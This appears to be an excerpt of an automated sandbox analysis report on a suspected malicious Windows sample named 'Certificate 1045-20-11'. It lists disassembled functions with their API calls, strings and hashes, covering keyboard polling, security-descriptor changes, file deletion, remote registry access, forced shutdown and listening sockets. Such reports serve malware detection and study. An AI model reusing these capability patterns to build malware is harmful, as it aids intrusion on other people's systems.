                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 3566783562-438819550
                                                                                • Opcode ID: 275ea1ad7e01de046290e4e5d4f5750cdf73a5c4751d181f086bd4b874737a41
                                                                                • Instruction ID: 307bc41ec5b89a9bfab605408b03191847afe1161498e831589e8d9410372101
                                                                                • Opcode Fuzzy Hash: 275ea1ad7e01de046290e4e5d4f5750cdf73a5c4751d181f086bd4b874737a41
                                                                                • Instruction Fuzzy Hash: 716139725043059FDB10EF64C84599EB3E8FF89314F08892AF989C7252EB35EA45CF92
                                                                                Function 0087A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
                                                                                  • Part of subcall function 0087ABBB: GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
                                                                                  • Part of subcall function 0087ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
                                                                                  • Part of subcall function 0087ABBB: HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
                                                                                  • Part of subcall function 0087AC56: GetProcessHeap.KERNEL32(00000008,0087A6B5,00000000,00000000,?,0087A6B5,?), ref: 0087AC62
                                                                                  • Part of subcall function 0087AC56: HeapAlloc.KERNEL32(00000000,?,0087A6B5,?), ref: 0087AC69
                                                                                  • Part of subcall function 0087AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0087A6B5,?), ref: 0087AC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0087A6D0
                                                                                • _memset.LIBCMT ref: 0087A6E5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0087A704
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A715
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0087A752
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087A76E
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A78B
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0087A79A
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0087A7A1
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0087A7C2
                                                                                • CopySid.ADVAPI32(00000000), ref: 0087A7C9
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0087A7FA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0087A820
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0087A834
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: e7dcfd3f877f624efbe3e897dd639e3a2d974cbd5f444ea2f5a63f51b019e0c1
                                                                                • Instruction ID: df595daf5921406b87ef2aab6959e8bcfdd20e9161f4291921afa6b1ad66009c
                                                                                • Opcode Fuzzy Hash: e7dcfd3f877f624efbe3e897dd639e3a2d974cbd5f444ea2f5a63f51b019e0c1
                                                                                • Instruction Fuzzy Hash: 1B513C71900209ABDF19DF95DC44EEEBBB9FF44700F048129F915EA294DB35DA05CB62
                                                                                Function 00846F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                • API String ID: 0-4052911093
                                                                                • Opcode ID: 628dc88f617ea7dc13890811a84e717b7a8eae174be121af7acfde250547cebf
                                                                                • Instruction ID: c14c02aae61a41c87b001cc0db1180b04fc149f025629441657b052a158f1054
                                                                                • Opcode Fuzzy Hash: 628dc88f617ea7dc13890811a84e717b7a8eae174be121af7acfde250547cebf
                                                                                • Instruction Fuzzy Hash: C7725D71E0421DDBDB24CF98C880BBEB7B5FF48314F14816AE905EB281EB749A419B95
                                                                                Function 008863F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • _wcscat.LIBCMT ref: 00886441
                                                                                • __wsplitpath.LIBCMT ref: 0088645F
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00886474
                                                                                • _wcscpy.LIBCMT ref: 008864A3
                                                                                • _wcscat.LIBCMT ref: 008864B8
                                                                                • _wcscat.LIBCMT ref: 008864CA
                                                                                • DeleteFileW.KERNEL32(?), ref: 008864DA
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 008864EB
                                                                                • FindClose.KERNEL32(00000000), ref: 00886506
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                • String ID: \*.*
                                                                                • API String ID: 2643075503-1173974218
                                                                                • Opcode ID: 910e9e04f574b62ba29abb06c0278100e6a84f5b59d91a44e5e4102a070569d9
                                                                                • Instruction ID: cadb66d752776768c97d63450cf78ea51f9e93d84a0b6f5476fd5f2ad8dd3a8c
                                                                                • Opcode Fuzzy Hash: 910e9e04f574b62ba29abb06c0278100e6a84f5b59d91a44e5e4102a070569d9
                                                                                • Instruction Fuzzy Hash: 463152B24083889AC721EBA88885DDFB7ECFF55310F44092AF6D9C3141FA35D5198767
                                                                                Function 008A31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A328E
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008A332D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008A33C5
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 008A3604
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A3611
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                • Opcode ID: 6023ba0a9267b34526b9aacd41fef8a84e2183652cc9a77268cd318957cb58f5
                                                                                • Instruction ID: a265e3cf31eb0f7e9e4981b9624bba3679ece5f4a5a8c40be952b769978ac486
                                                                                • Opcode Fuzzy Hash: 6023ba0a9267b34526b9aacd41fef8a84e2183652cc9a77268cd318957cb58f5
                                                                                • Instruction Fuzzy Hash: 5DE14A71604204AFDB14DF28C995E2ABBE8FF89714F04896DF54ADB2A1DB30ED05CB52
                                                                                Function 00882B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00882B5F
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00882BE0
                                                                                • GetKeyState.USER32(000000A0), ref: 00882BFB
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00882C15
                                                                                • GetKeyState.USER32(000000A1), ref: 00882C2A
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00882C42
                                                                                • GetKeyState.USER32(00000011), ref: 00882C54
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00882C6C
                                                                                • GetKeyState.USER32(00000012), ref: 00882C7E
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00882C96
                                                                                • GetKeyState.USER32(0000005B), ref: 00882CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 90058904406f4a29151073d3649a28af0d80e00c4d373a817fc1296385c22a1e
                                                                                • Instruction ID: 1225e4721b0c1d2303ea25649e8ba092fa9d764466a5a7cff2a12600bf03de55
                                                                                • Opcode Fuzzy Hash: 90058904406f4a29151073d3649a28af0d80e00c4d373a817fc1296385c22a1e
                                                                                • Instruction Fuzzy Hash: 9141B3345047C96DFF35BB6489047BABEA2FF11354F048059D9C6D62C2EBA49AC8C7A2
                                                                                Function 00896D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 9e029eae74aa04d3f9a65252f42d7350c05164b7e44448822e848c70b3c9fa7d
                                                                                • Instruction ID: 1ef17caf74a7c0cae91800a43418eeac9d32d519d3ead004459a772be8dadea1
                                                                                • Opcode Fuzzy Hash: 9e029eae74aa04d3f9a65252f42d7350c05164b7e44448822e848c70b3c9fa7d
                                                                                • Instruction Fuzzy Hash: 9A214631200214AFEB11BF68DC49F2EB7A8FF54711F04802AF95ADB2A1DB75AD118B95
                                                                                Function 0089C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00879ABF: CLSIDFromProgID.OLE32 ref: 00879ADC
                                                                                  • Part of subcall function 00879ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00879AF7
                                                                                  • Part of subcall function 00879ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00879B05
                                                                                  • Part of subcall function 00879ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00879B15
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0089C235
                                                                                • _memset.LIBCMT ref: 0089C242
                                                                                • _memset.LIBCMT ref: 0089C360
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0089C38C
                                                                                • CoTaskMemFree.OLE32(?), ref: 0089C397
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 0089C3E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                • Opcode ID: 48020318ecdc8a7d8630b2f431c39ca82fef1089cf5d30e5686b61e6c1afa222
                                                                                • Instruction ID: e29a97a90098fecee69ac8da50fcb68a667d6d450af151fe804c60d3dde9810b
                                                                                • Opcode Fuzzy Hash: 48020318ecdc8a7d8630b2f431c39ca82fef1089cf5d30e5686b61e6c1afa222
                                                                                • Instruction Fuzzy Hash: 0E910771D00219ABDF10EF94D841EEEBBB8FF04710F14812AE919E7291EB719A45CBA1
                                                                                Function 008879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
                                                                                  • Part of subcall function 0087B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
                                                                                  • Part of subcall function 0087B134: GetLastError.KERNEL32 ref: 0087B1BA
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00887A0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                • Opcode ID: dd93edd19beafb5ac78efb15d0558eb0a6047821e999d8e45c085be4b2676193
                                                                                • Instruction ID: d2223b778c5ab649889318d1a387a651b7eb76779da70301a97c0419df015d6c
                                                                                • Opcode Fuzzy Hash: dd93edd19beafb5ac78efb15d0558eb0a6047821e999d8e45c085be4b2676193
                                                                                • Instruction Fuzzy Hash: EF0184716A83366AE72C7668DC9AFBF7278FB00744F344424B953E20D2E565DE0083B5
                                                                                Function 00898C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00898CA8
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898CB7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00898CD3
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00898CE2
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898CFC
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00898D10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                • Opcode ID: 63773059b949f99c4ce7c839cf17176ff42ae9b8142f405d5f29586617fa6c31
                                                                                • Instruction ID: 6fb9efed237fe69310a5f7a0d987392b174b210d4bac6f9fb206bf7715dfa741
                                                                                • Opcode Fuzzy Hash: 63773059b949f99c4ce7c839cf17176ff42ae9b8142f405d5f29586617fa6c31
                                                                                • Instruction Fuzzy Hash: 5021CC31600205DFCB10BF28C885A6EB7B9FF4A324F148568F956E72D2CB70AD018B62
                                                                                Function 00886532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00886554
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00886564
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00886583
                                                                                • __wsplitpath.LIBCMT ref: 008865A7
                                                                                • _wcscat.LIBCMT ref: 008865BA
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 008865F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1605983538-0
                                                                                • Opcode ID: 44e7bdb75bb21a6402be1cca4c0b9c719a07d8990b76f6a329e26a7dbb975c8d
                                                                                • Instruction ID: 8fdbaf6da498a634f0721dacba874c1aa8eed32c8791146cb2f89d91371ce260
                                                                                • Opcode Fuzzy Hash: 44e7bdb75bb21a6402be1cca4c0b9c719a07d8990b76f6a329e26a7dbb975c8d
                                                                                • Instruction Fuzzy Hash: EA214F71900218ABDB10BBA4CD89FEAB7BCFB48300F5004AAE505E7141EB719B85CB61
                                                                                Function 0089923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0089A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00899296
                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008992B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: 83bfb6980cde47098c5fc97b8a735af29605ecaad36df528b111908ec920401a
                                                                                • Instruction ID: 010ad2a66286dc2741c390bf48b334a8997b5884390e672852d37f9b05bac611
                                                                                • Opcode Fuzzy Hash: 83bfb6980cde47098c5fc97b8a735af29605ecaad36df528b111908ec920401a
                                                                                • Instruction Fuzzy Hash: F4417A70600204AFDB14BB688886E7EB7E9FF44724F14855CF996EB392DA749D018B92
                                                                                Function 0088EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088EB8A
                                                                                • _wcscmp.LIBCMT ref: 0088EBBA
                                                                                • _wcscmp.LIBCMT ref: 0088EBCF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0088EBE0
                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0088EC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 2387731787-0
                                                                                • Opcode ID: 0a35d68e3a4a10fb741b09fcf99633247292de017d793cab17cad53f6eda6f50
                                                                                • Instruction ID: 674917af00c827e0299d7cdffe814a80c481b2a75a205ed5bce2553a1d2efae7
                                                                                • Opcode Fuzzy Hash: 0a35d68e3a4a10fb741b09fcf99633247292de017d793cab17cad53f6eda6f50
                                                                                • Instruction Fuzzy Hash: 6841AF356003018FCB18EF28C491A9AB7E5FF4A324F10455DEA5ACB3A1DB31A944CB52
                                                                                Function 008A8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
